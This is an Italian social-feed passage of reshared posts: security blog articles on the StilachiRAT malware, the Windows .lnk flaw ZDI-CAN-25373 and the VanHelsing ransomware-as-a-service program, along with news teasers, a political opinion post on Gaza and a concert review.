  • Monitorare le sessioni RDP e implementare autenticazione a più fattori;
  • Effettuare controlli di sicurezza regolari per individuare attività anomale.


Conclusione


Il panorama delle minacce informatiche non mostra segni di rallentamento e StilachiRAT ne è l’ennesima dimostrazione. Questo malware rappresenta un rischio concreto per aziende e utenti, con il suo focus su credenziali, criptovalute e accessi remoti. La difesa efficace passa attraverso la consapevolezza e l’adozione di misure di sicurezza mirate. L’informazione e la prevenzione sono le armi più potenti contro queste minacce in continua evoluzione.

L'articolo StilachiRAT: il malware fantasma che ruba credenziali e criptovalute senza lasciare traccia! proviene da il blog della sicurezza informatica.



Corso per docenti della scuola secondaria di primo grado: Leggere per Crescere

@Politica interna, europea e internazionale

UN LIBRO CONTRO IL DETERIORAMENTO CEREBRALE. LE SOLUZIONI DELLA SCUOLA AL BRAIN-ROT DELL’ERA DIGITALE. Il corso si propone di: dotare i docenti di strumenti pratici e teorici per comprendere il funzionamento del cervello umano durante la lettura



8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT


Il team di threat hunting di Trend Zero Day Initiative™ (ZDI) ha identificato casi significativi di sfruttamento di un bug di sicurezza in una serie di campagne risalenti al 2017. L’analisi ha rivelato che 11 gruppi sponsorizzati da stati provenienti da Corea del Nord, Iran, Russia e Cina hanno impiegato il bug monitorato con il codice ZDI-CAN-25373 in operazioni motivate principalmente da cyber spionaggio e furto di dati.

Trendmicro ha scoperto quasi mille campioni Shell Link (.lnk) che sfruttano ZDI-CAN-25373; tuttavia, è probabile che il numero totale di tentativi di sfruttamento sia molto più alto. Successivamente, i ricercatori hanno inviato un exploit proof-of-concept tramite il programma bug bounty di Trend ZDI a Microsoft, che ha rifiutato di risolvere questa vulnerabilità con una patch di sicurezza.
Numero di campioni da gruppi APT che sfruttano ZDI-CAN-25373 (fonte TrendMicro)
La vulnerabilità, identificata come ZDI-CAN-25373, consente agli aggressori di eseguire comandi dannosi nascosti sui computer delle vittime sfruttando file di collegamento di Windows (.lnk) appositamente creati. Questa falla di sicurezza influisce sul modo in cui Windows visualizza il contenuto dei file di collegamento tramite la sua interfaccia utente. Quando gli utenti esaminano un file .lnk compromesso, Windows non riesce a visualizzare i comandi dannosi nascosti al suo interno, nascondendo di fatto il vero pericolo del file.

Ad oggi sono stati scoperti quasi 1.000 artefatti del file .LNK che sfruttano ZDI-CAN-25373, la maggior parte dei quali è collegata a Evil Corp (Water Asena), Kimsuky (Earth Kumiho), Konni (Earth Imp), Bitter (Earth Anansi) e ScarCruft (Earth Manticore).

Degli 11 attori di minacce sponsorizzati dallo stato che sono stati scoperti ad abusare della falla, quasi la metà di loro proviene dalla Corea del Nord. Oltre a sfruttare la falla in vari momenti, la scoperta serve come indicazione di collaborazione incrociata tra i diversi cluster di minacce che operano all’interno dell’apparato informatico di Pyongyang.
Paesi di origine APT che hanno sfruttato ZDI-CAN-25373 (fonte TrendMicro)
Nello specifico, il bug comporta l’aggiunta degli argomenti con i caratteri di spazio (0x20), tabulazione orizzontale (0x09), avanzamento riga (0x0A), tabulazione verticale (\x0B), avanzamento pagina (\x0C) e ritorno a capo (0x0D) per eludere il rilevamento.

I dati di telemetria indicano che governi, enti privati, organizzazioni finanziarie, think tank, fornitori di servizi di telecomunicazione e agenzie militari/difesa situate negli Stati Uniti, in Canada, Russia, Corea del Sud, Vietnam e Brasile sono diventati i principali obiettivi degli attacchi che sfruttano questa vulnerabilità.

Negli attacchi analizzati da ZDI, i file .LNK fungono da veicolo di distribuzione per famiglie di malware note come Lumma Stealer, GuLoader e Remcos RAT, tra gli altri. Tra queste campagne, degna di nota è lo sfruttamento di ZDI-CAN-25373 da parte di Evil Corp.

Vale la pena notare che .LNK è tra le estensioni di file pericolose bloccate nei prodotti microsoft come Outlook, Word, Excel, PowerPoint e OneNote. Di conseguenza, il tentativo di aprire tali file scaricati dal Web avvia automaticamente un avviso di sicurezza che consiglia agli utenti di non aprire file da fonti sconosciute.

L'articolo 8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione


Il panorama delle minacce ransomware è in costante evoluzione, con gruppi sempre più strutturati che adottano strategie sofisticate per massimizzare il profitto. VanHelsing è un nuovo attore che si sta posizionando nel mercato del Ransomware-as-a-Service (RaaS), un modello che consente anche a cybercriminali con competenze limitate di condurre attacchi avanzati grazie a una piattaforma automatizzata.

Dopo l’annuncio del 23 febbraio 2025 sul forum underground riguardante il programma di affiliazione VanHelsing RaaS, il gruppo ransomware ha ufficialmente pubblicato la prima possbile vittima sul proprio Data Leak Site (DLS).

A meno di un mese dal lancio, la comparsa della prima organizzazione colpita conferma che il gruppo ha iniziato ad operare attivamente. Sebbene il DLS sia ancora scarno, il debutto di una vittima suggerisce che gli affiliati stiano già distribuendo il ransomware e che il numero di attacchi potrebbe aumentare rapidamente.

VanHelsing RaaS: Un Programma Strutturato per gli Affiliati


L’annuncio del 23 febbraio ha rivelato dettagli significativi sul funzionamento del programma VanHelsing RaaS, che si distingue per una strategia di reclutamento selettivo e strumenti avanzati.

Punti chiave del programma di affiliazione:

  • Ingresso su invito: gli affiliati con una reputazione consolidata nel cybercrime possono aderire gratuitamente.
  • Quota di ingresso per nuovi affiliati: chi non ha una reputazione pregressa deve pagare $5.000 per accedere alla piattaforma.
  • Strumenti avanzati: accesso a un pannello web, un sistema di chat privato, un locker per chiavi di cifratura, strumenti di esfiltrazione dati e funzionalità di attacco ransomware automatizzate.
  • Revenue sharing: gli affiliati trattengono l’80% del riscatto, mentre VanHelsing trattiene il 20%.
  • Escrow su blockchain: i fondi vengono rilasciati dopo due conferme, riducendo i rischi di frode tra affiliati e sviluppatori.
  • Crittografia avanzata: utilizzo di protocolli di cifratura di alto livello per rendere il ransomware resiliente alle contromisure.
  • Automazione completa: il ransomware è interamente gestito tramite il pannello di controllo, eliminando errori operativi e riducendo la necessità di intervento manuale.


La Prima Possibile Vittima Pubblicata sul DLS


La prima possibile organizzazione colpita da VanHelsing RaaS opera nel settore pubblico, con funzioni amministrative Questo suggerisce che il gruppo potrebbe prendere di mira enti governativi, municipalità o servizi pubblici, categorie spesso vulnerabili a ransomware.

L’attacco sembra seguire una strategia di doppia estorsione, con un countdown di 10 giorni prima della pubblicazione dei dati esfiltrati. Questo lascia intendere che il gruppo stia negoziando un riscatto con l’ente colpito, cercando di massimizzare il profitto prima di rendere pubbliche eventuali informazioni sensibili.

Anatomia del DLS


Al momento, il DLS di VanHelsing contiene una sola possibile vittima, il che potrebbe indicare diverse possibilità:

  1. Il gruppo sta testando l’infrastruttura prima di pubblicare attacchi su larga scala.
  2. Ci sono altre vittime in fase di negoziazione, che non sono ancora state elencate nel DLS.
  3. Gli affiliati stanno ancora adottando il ransomware, e il numero di attacchi potrebbe aumentare esponenzialmente nelle prossime settimane.

L’esperienza con altri gruppi RaaS dimostra che il numero di vittime può crescere rapidamente man mano che nuovi cybercriminali iniziano ad utilizzare il servizio.

VanHelsing Chat: La Piattaforma di Comunicazione Privata


Un altro elemento distintivo di VanHelsing è la presenza di un portale di chat privato, accessibile solo tramite un Session ID. Questa piattaforma suggerisce che il gruppo gestisce direttamente le negoziazioni con le vittime e le comunicazioni con gli affiliati, senza affidarsi a strumenti pubblici come Telegram o forum underground.

L’adozione di una chat privata offre diversi vantaggi operativi:

  • Maggiore sicurezza → Riduce il rischio di infiltrazioni da parte delle forze dell’ordine o di ricercatori di cybersecurity.
  • Gestione diretta delle richieste di riscatto → Le vittime possono comunicare direttamente con il team di VanHelsing o con l’affiliato responsabile dell’attacco.
  • Coordinamento degli affiliati → I membri del programma RaaS possono ricevere supporto tecnico e aggiornamenti operativi in tempo reale.

Questa infrastruttura è indicativa di un gruppo ransomware che punta a una gestione centralizzata e professionale degli attacchi, un elemento distintivo rispetto a operatori meno organizzati.

Conclusioni


L’emergere di VanHelsing RaaS rappresenta un’ulteriore evoluzione del modello ransomware, con un’infrastruttura altamente scalabile e strumenti avanzati per affiliati. La loro attenzione all’automazione e alla sicurezza operativa suggerisce che potremmo assistere a un aumento degli attacchi nei prossimi mesi, con impatti significativi su aziende e infrastrutture critiche.

L'articolo VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione proviene da il blog della sicurezza informatica.



Ddl Sicurezza, l’allarme delle opposizioni: “Troppi poteri ai Servizi segreti e schedature di massa”


@Politica interna, europea e internazionale
Le Commissioni Affari Costituzionali e Giustizia del Senato hanno approvato il contestato articolo 31 del nuovo ddl Sicurezza. Il via libera chiude l’esame degli emendamenti al disegno di legge, che – presentato dal Governo e già approvato dalla Camera lo



Data center: sistemi di monitoraggio efficiente delle prestazioni IT


@Informatica (Italy e non Italy 😁)
Produttività e resilienza sono conseguenze dirette di una gestione ottimale dei data center. Ecco le sei fasi basilari della gestione delle prestazioni IT
L'articolo Data center: sistemi di monitoraggio efficiente delle prestazioni IT proviene da Cyber



Mettetevi nei panni di un bambino palestinese e provate a capire cosa si prova a non avere più speranza, a non fidarsi più di nessuno. Mettetevi in una condizione di vita nella quale un popolo, quello israeliano sionista, vi consideri meno di bestie, decida quanta acqua potete bere, quanta corrente elettrica potete consumare. Mettetevi nei panni di un contadino della Cisgiordania che si vede tagliare con la motosega tutti gli olivi secolari da coloni invasati che non hanno niente di dissimile dai nostrani fascisti del ventennio. Mettetevi nei suoi panni quando deve subire le provocazioni senza potere reagire.
Moltiplicate questo per 365 giorni all’anno. Mettetevi nei panni di un ragazzino o un bambino che sta vivendo il genocidio del suo popolo nell’indifferenza generale. Mettetevi nei panni degli orfani, di chi al posto della casa, della via e del quartiere ora guarda una distesa disperata di macerie. Guardateli i potenti della terra ridere e scherzare con la tua vita tra le loro mani.
Mettevi nei panni di un palestinese che, sbagliando in modo colossale, si convinca che il fondamentalismo islamico sia la risposta a tanta violenza, (non capendo, colpevolmente, di avere a che fare con spudorati assassini della stessa identica matrice di quegli altri). Mettetevi nei panni di un palestinese senza più via d’uscita, senza speranza, senza futuro.
Niente possiamo noi pacifisti, niente possono gli israeliani sani, niente possono gli organismi internazionali e niente può la giustizia terrena e divina.

Il conflitto ha causato più di 70.000 morti dei quali circa 50.000 bambini e donne.
Questi sono stati sistematicamente sterminati grazie alle armi americane e alla colpevole e volontaria distrazione occidentale.

Lo stesso occidente conservatore, per mano americana, ha disarmato l’Onu, unico attore in grado di intervenire.

Netanyahu insieme ai generali del IDF sono indagati per evidenti crimini di guerra.
Nonostante questo viene riconosciuto come uno statista.
Trump, nel suo delirio di onnipotenza, vede Gaza israeliana e senza palestinesi.

Vale la pena ricordare che essere palestinesi non significa essere di Hamas.
Vale la pena ricordare che niente può giustificare l'omicidio di bambini.

Hamas, nonostante le perdite e la distruzione delle infrastrutture, è ancora in grado di gestire gli ostaggi e di vantarsi della propria bestialità.
L'operazione militare israeliana, relativamente alla risoluzione della tragedia degli ostaggi, è quindi un sostanziale fallimento. Invece, per quello che riguarda la persecuzione e l'impostazione di un moderno genocidio, uno grottesco successo.
I coloni, ignorando qualunque legge internazionale, hanno mano totalmente libera di commettere qualunque nefandezza.

Complessivamente stiamo assistendo a un inedito “colpo di stato (dei diritti) globale” da parte di una pletora di oligarchi che manipolano gruppi, movimenti e partiti uniti dalla convergenza di interessi (perlopiù economici).

Esiste quindi un “nuovo” asse iper-conservatore che mira al controllo globale bypassando ogni regola democratica.

Questi, al pari del nazi-fascismo, sono dalla parte sbagliata della storia.
Così come ieri sarei stato, senza neanche un dubbio, dalla parte degli ebrei, degli zingari e di qualsiasi minoranza perseguitata dal nazi fascismo. Oggi lo sono, senza se e senza ma, dalla parte dei popoli perseguitati dalla fame, guerra, dalla parte dei più deboli.

Non è un buon momento.

Valerio Perla reshared this.



Truffe online, nel mirino è la GenZ: come mitigare il rischio


@Informatica (Italy e non Italy 😁)
Le truffe online non guardano in faccia a nessuno, ma la GenZ, cresciuta con Internet ed esperta di digitale, si scopre più vulnerabile di altre generazioni. Ecco come proteggersi
L'articolo Truffe online, nel mirino è la GenZ: come mitigare il rischio proviene da Cyber Security 360.



IlBlues.org: Michele Dal Lago e Giusi Pesenti – un viaggio musicale


Bellissima serata al Bo.Po di Ponteranica (BG), dove si sono esibiti il chitarrista e cantante Michele Del Lago e la cantante e percussionista Giusi Pesenti. Nonostante i due siano nella scena da diversi anni, non avevo mai avuto il piacere di ascoltarli live...

ilblues.org/michele-dal-lago-e…



I dati sintetici salveranno l’intelligenza artificiale?


@Informatica (Italy e non Italy 😁)
I dati su cui si alimentano i modelli linguistici corrono il rischio di esaurirsi, e già oggi sono meno disponibili per varie ragioni. Cosa significa per etichettatori di dati, piccole realtà che fanno ricerca, lo stato di salute del Web e gli sviluppi dell’Intelligenza artificiale.
L'articolo I dati



La manifestazione pro-Europa è stata pagata dal Comune di Roma. La Lega: “Presentiamo un esposto”


@Politica interna, europea e internazionale
La manifestazione pro-Europa che si è tenuta sabato scorso in piazza del Popolo a Roma è stata finanziata con fondi pubblici del Comune di Roma: l’esborso si aggira sui 270mila euro, tra allestimenti, logistica, servizio d’ordine e pulizia. Lo conferma

reshared this



Cloud, Google acquisisce Wiz per 32 miliardi di dollari per migliorare la cybersicurezza


@Informatica (Italy e non Italy 😁)
Google ha ufficializzato l’acquisizione della startup israeliana Wiz per un valore di 32 miliardi di dollari, segnando l’operazione più costosa nella sua storia. Questa mossa strategica mira a rafforzare Google Cloud e a potenziare le sue



Gaza. Israele scatena l’inferno promesso


@Notizie dall'Italia e dal mondo
Violenti bombardamenti su tutta la Striscia da nord a sud, senza preavviso. 150 bambini tra le vittime. Per Tel Aviv «è solo l’inizio». Colpite le case danneggiate dentro cui si riparavano intere famiglie, scuole-rifugio e tende per sfollatihttps://pagineesteri.it/2025/03/19/medioriente/gaza-israele-scatena-linferno-promesso/



Come gestire le chiavi crittografiche


@Informatica (Italy e non Italy 😁)
L’efficacia della crittografia è direttamente legata al modo in cui vengono gestite le chiavi. Ecco alcuni consigli utili a comprendere cosa fare e perché farlo
L'articolo Come gestire le chiavi crittografiche proviene da Cyber Security 360.

cybersecurity360.it/outlook/co…